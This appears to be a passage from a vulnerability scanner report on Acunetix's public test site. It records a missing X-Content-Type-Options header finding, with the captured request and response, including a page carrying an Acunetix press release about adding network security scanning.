value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 30545
Response Body - size: 30,545 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsb